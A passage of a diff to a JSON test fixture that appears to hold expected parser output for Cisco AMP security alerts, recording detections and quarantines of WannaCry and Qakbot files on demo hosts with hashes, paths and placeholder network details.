"be5d6279874da315e3080b06083757aad9b32c23" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.4A468603FD.04426d77.auto.Talos", + "cisco.amp.detection_id": "6419303569945526289", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 564000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "4fef5e34143e646dbf9907c4374276f5", + "file.hash.sha1": "47a9ad4125b6bd7c55e4e7da251e23f089407b8f", + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "file.name": "taskdl.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49887, + "process.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "process.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "process.hash.sha256": 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "4fef5e34143e646dbf9907c4374276f5", + "47a9ad4125b6bd7c55e4e7da251e23f089407b8f" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558981", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 782000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 51525, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + 
"cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558977", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 52645, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558984", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + 
"53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 791000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 53765, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558983", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 783000000, + 
"event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 55136, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558982", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 727000000, + "event.action": "Threat 
Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 56507, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 7144, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558981", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + 
"cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 721000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 58030, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 7144, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558980", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + 
"cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 646000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 59553, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558979", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 504000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 
6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 60814, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-95.SBX.TG", + "cisco.amp.detection_id": "6419303565650558978", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 426000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": 
"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 62075, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 768, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-95.SBX.TG", + "cisco.amp.detection_id": "6419303565650558977", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 399000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 
6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 63680, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 768, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 199000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412662859016176000, + 
"event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 65285, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:31.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 856000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412662854721208000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 66208, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241035", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + 
"cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 233000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 67131, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241034", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": 
"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 68332, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241033", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 69533, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": 
